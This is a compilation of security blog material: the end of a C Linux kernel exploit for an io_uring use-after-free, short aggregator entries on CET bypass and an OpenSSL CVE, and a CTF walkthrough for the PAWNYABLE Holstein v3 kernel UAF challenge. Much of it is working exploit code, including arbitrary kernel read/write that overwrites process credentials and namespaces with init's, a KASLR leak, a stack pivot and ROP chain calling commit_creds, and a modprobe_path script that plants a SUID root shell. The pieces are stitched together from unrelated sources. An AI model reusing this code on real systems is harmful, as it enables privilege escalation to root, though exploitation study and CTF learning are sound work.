    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

void write_what_where(uint32_t what, uint64_t where)
{
    // Reset the page contents
    reset_pipe_buf();

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);
}

void overwrite_real_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}

void overwrite_nsproxy(void)
{
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 
}

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

void make_ring_copy(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
    {
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));
    }
}

// Here, all we're doing is determining which side of the page the UAF file is on;
// if it's on the front half of the page, the back half is our scratch space,
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

// We failed the cross-cache stage (e.g. we didn't replace the UAF object)
void cc_fail(void)
{
    cc_reset();
    close(g_uaf_fd);
    g_uaf_fd = -1;
    release_pipe();
    create_pipe();
    sleep(1);
}

void write_pipe(unsigned char *buf)
{
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
    {
        err("`write()` failed");
    }
}

int main(int argc, char *argv[])
{
    info("Setting up exploit environment...");
    setup_env();

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

retry_cc:
    // Do cross-cache attempt
    info("Attempting cross-cache...");
    do_cc();

    // Replace UAF file (and page) with pipe page
    write_pipe(buf);

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
    {
        printf("[!] Cross-cache failed, retrying...");
        cc_fail();
        goto retry_cc;
    }

    // Success
    info("Cross-cache succeeded");
    sleep(1);

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
    {
        err("Weird `error_entry` address: 0x%lx", error_entry);
    }

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
    {
        err("Bad kernel signature: 0x%lx", sig);
    }

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
    {
        err("Weird init->cred value: 0x%lx", g_cred_what);
    }

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
    {
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
    }

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");
    traverse_tasks();

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    find_pipe_buf_addr();
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    set_scratch_space();
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    make_ring_copy();
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");
    overwrite_cred();

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);
    }

    // Overwrite our real_cred with init's cred
    sleep(1);
    info("Overwriting our real_cred with init's...");
    overwrite_real_cred();

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
    }

    // Overwrite our nsproxy with init's
    sleep(1);
    info("Overwriting our nsproxy with init's...");
    overwrite_nsproxy();

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
    {
        err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);
    }

    info("Creds and namespace look good!");
    
    // Let the child loose
    *(int *)g_shmem = 0x1337;

    sleep(3000);
}

Bypassing Intel CET with Counterfeit Objects

26 August 2022 at 00:00
Since its inception in 2005, return-oriented programming (ROP) has been the predominant avenue to thwart W^X mitigation during memory corruption exploitation. While Data Execution Prevention (DEP) has been engineered to block plain code injection attacks from specific memory areas, attackers have quickly adapted and, instead of injecting an entire code payload, they resorted to reusing multiple code chunks from DEP-allowed memory pages, called ROP gadgets. These code chunks are taken from already existing code in the target application and chained together to resemble the desired attacker payload or to just disable DEP on a per-page basis to allow the existing code payloads to run.

Practical Reverse Engineering' Solutions - Chapter 1 - Part 2

1 December 2022 at 00:00
Introduction From now on, I decided to prioritize the exercises form which I think I can gain the most, so here am I going to cover just the Kernel routines decompilation/explanation. The book originally focused on x86 by this point, but since we are in 2020 I feel might be useful to cover both x86 and x64. Chapter 1 - Page 35 Decompile the following kernel routines in Windows: KeInitializeDpc KeInitializeApc ObFastDereferenceObject (and explain its calling convention) KeInitializeQueue KxWaitForLockChainValid KeReadyThread KiInitializeTSS RtlValidateUnicodeString Debugging Setup For debugging purpose I have used WinDbg with remote KD.


Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

1 November 2022 at 10:27

Discussion thread: https://updatedsecurity.com/topic/9-openssl-vulnerability-cve-2022-3602-cve-2022-3786/. Vulnerability details from https://www.openssl.org/news/secadv/20221101.txt: X.509 Email Address 4-byte Buffer Overflow (CVE-2022-3602), Severity: High. A buffer overrun can be triggered in X.509


PAWNYABLE UAF Walkthrough (Holstein v3)

By: h0mbre
29 October 2022 at 04:00

Introduction

I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

What I Started With

PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and your first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but started gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually led to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated), I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

What I Did

To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

  • Introduction to kernel exploits
  • kernel debugging with gdb
  • security mechanism (Overview of Exploitation Mitigations)
  • Compile and transfer exploits (working with the kernel image)

This was great as a starting point because everything is so well organized that you don’t have to spend time setting up your environment; it’s basically just copy-pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

Next, I started working on the first challenge, which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer, and from there you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges via functions like prepare_kernel_cred and commit_creds.

You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.
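
For reference, here is roughly what the userland half of the modprobe_path technique looks like. This is only a hedged sketch: it assumes the kernel-side primitive (the ROP chain or an arbitrary write) has already pointed modprobe_path at "/tmp/x", and the helper name, file paths, and payload are just illustrative.

#include <stdlib.h>    /* system */
#include <sys/stat.h>  /* chmod */

// Userland half of the modprobe_path technique (sketch). The kernel-side
// write is assumed to have already redirected modprobe_path to "/tmp/x".
static void modprobe_trigger(void) {
    // Script the kernel will run as root once modprobe_path fires.
    // The exact payload here depends on the target (this one makes a
    // SUID copy of /bin/sh).
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'cp /bin/sh /tmp/rootsh; chmod u+s /tmp/rootsh' >> /tmp/x");
    chmod("/tmp/x", 0755);

    // A file with an unknown magic number; exec'ing it makes the kernel
    // invoke modprobe_path (now /tmp/x) while searching for a binfmt handler
    system("printf '\\xff\\xff\\xff\\xff' > /tmp/trigger");
    chmod("/tmp/trigger", 0755);
    system("/tmp/trigger");   // the exec fails, but /tmp/x has run as root

    system("/tmp/rootsh -p"); // use the SUID shell (-p keeps the euid)
}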

After all this, I felt like I had a good enough base to get started on the UAF challenge.

UAF Challenge: Holstein v3

Some quick vulnerability analysis of the vulnerable driver provided by the author makes the problem clear.

char *g_buf = NULL;

static int module_open(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_open called\n");

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;
  }

  return 0;
}

When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

static int module_close(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_close called\n");
  kfree(g_buf);
  return 0;
}

When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

  1. We’ve done nothing, g_buf = NULL
  2. We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
  3. We’ve opened the driver a second time, g_buf = 0xffff...b0 . The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
  4. We close fd1, which calls kfree() on 0xffff...b0 and frees the same pointer we still have a reference to through fd2 (a minimal userland sketch of this sequence follows the list).
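
To make the steps above concrete, here is a minimal userland sketch of steps 2–4. The device path comes from the full exploit later in the post; the helper name is mine and error handling is omitted.

#include <fcntl.h>   /* open */
#include <unistd.h>  /* close */

// Two opens, one close: fd2 is left holding a dangling reference to the
// freed g_buf allocation.
static int make_uaf(void) {
    int fd1 = open("/dev/holstein", O_RDWR);  // g_buf = kzalloc(0x400)
    int fd2 = open("/dev/holstein", O_RDWR);  // g_buf gets overwritten
    close(fd1);                               // kfree(g_buf)
    return fd2;                               // reads/writes now hit freed memory
}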

At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
  printk(KERN_INFO "module_read called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_to_user(buf, g_buf, count)) {
    printk(KERN_INFO "copy_to_user failed\n");
    return -EINVAL;
  }

  return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
  printk(KERN_INFO "module_write called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_from_user(g_buf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }

  return count;
}

So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

At a high level, UAFs are generally exploited by creating the UAF condition, so that we have a reference to a freed object within our control, and then causing the allocation of a different object to fill the space that was previously occupied by our freed object.

So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

KASLR Bypass

The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog of useful Linux Kernel data structures for exploitation. This led me to the tty_struct, which is allocated on the same slab cache as our 0x400 buffer, kmalloc-1024. The tty_struct has a field called ops, a pointer to a tty_operations function table that sits at a static offset from the kernel base. So if we can leak the address of that table, we will have bypassed KASLR. This struct was used by NCC Group for the same purpose in their exploit of CVE-2022-32250.

It’s important to note that the slab cache we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core, so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.
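
For completeness, here is a sketch of what that pinning could look like on a multi-core box. This isn’t needed for the challenge VM and isn’t part of the original exploit; it’s just the generic sched_setaffinity pattern you would reach for so the kfree() and the later object spray hit the same per-CPU slab cache.

#define _GNU_SOURCE
#include <sched.h>   /* sched_setaffinity, CPU_ZERO, CPU_SET */

// Pin the calling thread to a single CPU so all of our allocations and
// frees are serviced by that CPU's slab cache.
static int pin_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);  // pid 0 == this thread
}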

So with our module_read ability, we will simply:

  1. Free g_buf
  2. Spray tty_struct allocations (by opening /dev/ptmx) until one hopefully fills the freed space where g_buf used to live
  3. Call module_read to get a copy of g_buf, which is now actually a tty_struct, and inspect the value of tty_struct->ops.

Here are some snippets of code related to that from the exploit:

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

There’s a confusing part about ANDing off the lower 12 bits of the leaked value, and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there are two kinds of tty_structs that can be allocated and they are allocated in pairs. The if/else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

RIP Control

Next, we need some way to hijack execution. Luckily, we can use the same data structure, tty_struct, since we can write to the object using module_write and overwrite the pointer value of tty_struct->ops.

struct tty_operations is a table of function pointers, and looks like this:

struct tty_operations {
	struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
...SNIP...

These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

So our plan will be to:

  1. Create UAF condition
  2. Occupy free’d memory with tty_struct
  3. Read a copy of the tty_struct back to us in userland
  4. Alter the tty->ops value to point to a faked function table that we control
  5. Write the new data back to the tty_struct which is now corrupted
  6. Do something to the tty_struct that causes a function we control to be invoked

PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;

The gadget pushes the value in RDX onto the stack and then pops it into RSP, so when the gadget’s ret executes, we “return” to whatever value we called ioctl() with in arg. So the control flow will go something like this (a minimal sketch of the trigger call follows the list):

  1. Invoke ioctl() on our corrupted tty_struct
  2. ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
  3. ioctl() returns execution to our ROP chain
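
Here is a hedged sketch of what that trigger call looks like from userland; it mirrors the ioctl() spam at the end of the full exploit. The function name is mine and the cmd value is arbitrary.

#include <stdint.h>     /* uint64_t */
#include <sys/ioctl.h>  /* ioctl */

// The pivot gadget does: push rdx ; ... ; pop rsp ; pop rbp ; ret.
// RSP becomes arg, `pop rbp` consumes the first 8 bytes, and `ret` lands
// at arg + 8, so we pass rop_addr - 8 to start execution exactly at the
// first entry of the ROP chain.
static void trigger_pivot(int ptmx_fd, uint64_t rop_addr) {
    ioctl(ptmx_fd, 0xcafebabe, rop_addr - 8);
}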

So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

Creating/Locating a ROP Chain and Fake Function Table

This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

  • Stores arbitrary data inline in the structure body (not via a pointer to the heap)
  • Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

So quickly, a strategy began to form. We could:

  1. Create our ROP chain and fake function table in a buffer
  2. Send the buffer as the body of a msg_msg struct
  3. Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calculate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

I got a bit wordy with the comments in this block, but it’s for good reason: I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem, as we are completely hijacking the ops function table which the kernel will use to clean up our tty_struct. So I found a gadget that simply performs a ret operation and overwrote the function pointers for close(), shutdown(), and cleanup(), so that when they are invoked they simply return, and the kernel is apparently fine with this and doesn’t panic.

So our message body looks something like: <—-ROP—-Faked Function Table—->

Here is the code I used to overwrite the tty_struct->ops pointer:

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

